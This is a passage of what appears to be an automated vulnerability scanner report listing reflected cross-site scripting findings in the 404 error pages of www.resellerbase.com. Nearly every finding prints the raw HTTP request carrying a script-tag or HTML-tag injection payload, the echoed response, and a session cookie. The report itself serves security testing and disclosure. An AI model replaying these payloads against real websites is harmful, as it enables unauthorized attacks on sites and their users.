The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6ba89<script>alert(1)</script>33bfcbb7b33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos6ba89<script>alert(1)</script>33bfcbb7b33/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos6ba89<script>alert(1)</script>33bfcbb7b33/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2036. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4226d<script>alert(1)</script>56d8f1a04dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images4226d<script>alert(1)</script>56d8f1a04dd/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images4226d<script>alert(1)</script>56d8f1a04dd/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2037. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3ae52<script>alert(1)</script>bc0ee88bf58 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating3ae52<script>alert(1)</script>bc0ee88bf58/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating3ae52<script>alert(1)</script>bc0ee88bf58/4.gif was not found on this server.</p>
...[SNIP]...

2.2038. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4aa13<script>alert(1)</script>1480fe098c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/4.gif4aa13<script>alert(1)</script>1480fe098c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/4.gif4aa13<script>alert(1)</script>1480fe098c was not found on this server.</p>
...[SNIP]...

2.2039. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 631a3<script>alert(1)</script>50af7ec63be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/4.gif?631a3<script>alert(1)</script>50af7ec63be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/4.gif?631a3<script>alert(1)</script>50af7ec63be=1 was not found on this server.</p>
...[SNIP]...

2.2040. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5151e<script>alert(1)</script>4edbac2b67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5151e<script>alert(1)</script>4edbac2b67/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5151e<script>alert(1)</script>4edbac2b67/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2041. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ff5d<script>alert(1)</script>0ef79259894 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/295ff5d<script>alert(1)</script>0ef79259894/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/295ff5d<script>alert(1)</script>0ef79259894/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2042. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37dee<script>alert(1)</script>13139eb7d19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes37dee<script>alert(1)</script>13139eb7d19/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes37dee<script>alert(1)</script>13139eb7d19/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2043. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9f3a<script>alert(1)</script>740a1c2357a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmosa9f3a<script>alert(1)</script>740a1c2357a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmosa9f3a<script>alert(1)</script>740a1c2357a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2044. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4a10c<script>alert(1)</script>5605304226a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images4a10c<script>alert(1)</script>5605304226a/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images4a10c<script>alert(1)</script>5605304226a/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2045. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a8d3f<script>alert(1)</script>d26584ecb9a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/ratinga8d3f<script>alert(1)</script>d26584ecb9a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/ratinga8d3f<script>alert(1)</script>d26584ecb9a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2046. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 90b6b<script>alert(1)</script>e1fe7e1ec85 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/search.php90b6b<script>alert(1)</script>e1fe7e1ec85?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php90b6b<script>alert(1)</script>e1fe7e1ec85?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2047. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3cc4e<a>07a793ea203 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3cc4e<a>07a793ea203&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3cc4e<a>07a793ea203&opt=2 was not found on this server.</p>
...[SNIP]...

2.2048. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2517f<a>4bcbd075cc3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...2517f<a>4bcbd075cc3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php?keyword=search...2517f<a>4bcbd075cc3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2049. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ba2ab<script>alert(1)</script>f75b6eef62e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&ba2ab<script>alert(1)</script>f75b6eef62e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&ba2ab<script>alert(1)</script>f75b6eef62e=1 was not found on this server.</p>
...[SNIP]...

2.2050. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c4739<a>a66e99fcee4 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2c4739<a>a66e99fcee4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2c4739<a>a66e99fcee4 was not found on this server.</p>
...[SNIP]...

2.2051. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a20c<script>alert(1)</script>2c0e383f141 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5a20c<script>alert(1)</script>2c0e383f141/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5a20c<script>alert(1)</script>2c0e383f141/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2052. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ed36<script>alert(1)</script>feee46ab7c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/291ed36<script>alert(1)</script>feee46ab7c5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/291ed36<script>alert(1)</script>feee46ab7c5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2053. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

